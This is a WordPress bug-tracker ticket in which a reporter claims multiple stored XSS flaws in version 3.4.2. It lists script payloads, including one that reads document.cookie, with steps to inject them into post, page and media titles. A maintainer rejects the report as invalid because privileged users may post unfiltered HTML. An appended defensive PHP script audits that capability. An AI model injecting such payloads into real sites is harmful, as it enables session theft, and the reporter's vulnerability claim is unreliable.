#21917 closed defect (bug) (invalid)
Wordpress 3.4.2 - Multiple XSS Vulnerability
| Reported by: | | Owned by: | |
|---|---|---|---|
| Milestone: | | Priority: | normal |
| Severity: | normal | Version: | 3.4.2 |
| Component: | General | Keywords: | |
| Focuses: | | Cc: | |
Description
[ Wordpress 3.4.2 - Multiple XSS Vulnerability ]
Hello, my name is Catur Febrian (nuxbie).
I have found bugs in the new web app Wordpress (last version).
These bugs are XSS (Cross Site Scripting).
Wordpress 3.4.2 has multiple vulns.
- XSS WP-Post.
- XSS WP-Page.
- XSS WP-MediaLibrary.
Please, read my exploit report... :-)
Exploit Title: CMS Wordpress - Multiple XSS Vulnerability
Author : TheCyberNuxbie [ Catur Febrian ]
E-mail : root@…
Version CMS : Version 3.4.2 (Last Version)
Category : WebApps / Content Management System (CMS)
Security Risk: Medium Level
Link Download: http://www.wordpress.org/
Tested On : Mozilla Firefox + Xampp + Windows 7 x32 ID
[ Information Content ]
WordPress - Web Publishing Software.
http://www.wordpress.org/
[ Vulnerability Details ]
- XSS WP-Post.
- XSS WP-Page.
- XSS WP-MediaLibrary.
[ XSS CODE ]
<script>alert('31337');</script>
<script>alert(document.cookie);</script>
<script>window.open("http://www.google.com/")</script>
- Exploit Report:
- Create / Edit WP-Post:
Input "Title Post" with Script XSS.
<script>alert('31337');</script>
http://wordpress/wp-admin/post-new.php <--- Publish.
View XSS: http://wordpress/?p=xxx <--- XSSed.
PIC: http://31337sec.com/wordpress/xss-post1.jpg + http://31337sec.com/wordpress/xss-post2.jpg
- Create / Edit WP-Page:
Input "Title Page" with Script XSS.
<script>alert('31337');</script>
http://wordpress/wp-admin/post-new.php?post_type=page <--- Publish.
View XSS: http://wordpress/?page_id=xxx <--- XSSed.
PIC: http://31337sec.com/wordpress/xss-page1.jpg + http://31337sec.com/wordpress/xss-page2.jpg
- Add / Edit WP-Media Library:
Upload files via Media Library.
http://wordpress/wp-admin/media-new.php <--- Select File.
Upload Files, Save...!!!
Input Form "Title", "Caption", "Description" with Script XSS <--- Save All Changes.
View XSS: http://wordpress/?attachment_id=xxx <--- XSSed.
PIC: http://31337sec.com/wordpress/xss-media1.jpg + http://31337sec.com/wordpress/xss-media2.jpg + http://31337sec.com/wordpress/xss-media3.jpg
- Script XSS will be affected:
- Frontend Website (post).
http://wordpress/?p=xxx <--- XSSed.
- Frontend Website (page).
http://wordpress/?page_id=xxx <--- XSSed.
- Frontend Website (attachment).
http://wordpress/?attachment_id=xxx <--- XSSed.
Thanks...
TheCyberNuxbie
Please do not report "security issues" publicly. http://codex.wordpress.org/Security_FAQ#Where_do_I_report_security_issues.3F
Also, this isn't a security issue. http://codex.wordpress.org/Security_FAQ#Why_are_some_users_allowed_to_post_unfiltered_HTML.3F
If you posted this publicly anywhere else (exploit sites, disclosure mailing lists) please rescind it as invalid.
We encourage responsible, private disclosure of security issues in part so invalid reports do not spread.
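
The Security FAQ entry linked in the reply concerns accounts that are allowed to post unfiltered HTML, which WordPress controls through the `unfiltered_html` capability. As an added example (not code from this ticket or from WordPress core), the script below audits which roles and users hold that capability on a site. It assumes WordPress is already loaded, for instance by running it with WP-CLI's `wp eval-file`, and `audit_unfiltered_html()` is a hypothetical helper name.

```php
<?php
// Added example: audit who may save unfiltered HTML on this site.
// Assumption: WordPress is already loaded (e.g. `wp eval-file audit.php`).
// audit_unfiltered_html() is a hypothetical helper, not a core function.

function audit_unfiltered_html() {
    $report = array(
        // When this constant is true, core denies unfiltered_html to everyone.
        'globally_disabled' => defined( 'DISALLOW_UNFILTERED_HTML' ) && DISALLOW_UNFILTERED_HTML,
        'multisite'         => is_multisite(),
        'roles'             => array(),
        'users'             => array(),
    );

    // Roles whose stored capability list grants unfiltered_html.
    foreach ( wp_roles()->role_objects as $name => $role ) {
        if ( $role->has_cap( 'unfiltered_html' ) ) {
            $report['roles'][] = $name;
        }
    }

    // Check each user through user_can(), which applies map_meta_cap():
    // that is where DISALLOW_UNFILTERED_HTML and the multisite
    // super-admin restriction take effect.
    $users = get_users( array( 'fields' => array( 'ID', 'user_login' ) ) );
    foreach ( $users as $user ) {
        if ( user_can( (int) $user->ID, 'unfiltered_html' ) ) {
            $report['users'][] = $user->user_login;
        }
    }

    return $report;
}

$r = audit_unfiltered_html();
printf( "DISALLOW_UNFILTERED_HTML set: %s\n", $r['globally_disabled'] ? 'yes' : 'no' );
printf( "Multisite: %s\n", $r['multisite'] ? 'yes' : 'no' );
printf( "Roles granting unfiltered_html: %s\n", implode( ', ', $r['roles'] ) ?: '(none)' );
printf( "Users effectively allowed: %s\n", implode( ', ', $r['users'] ) ?: '(none)' );
```

Setting `define( 'DISALLOW_UNFILTERED_HTML', true );` in `wp-config.php` removes the capability from every account, so titles and content are passed through KSES on save. Content stored before the change is not re-filtered.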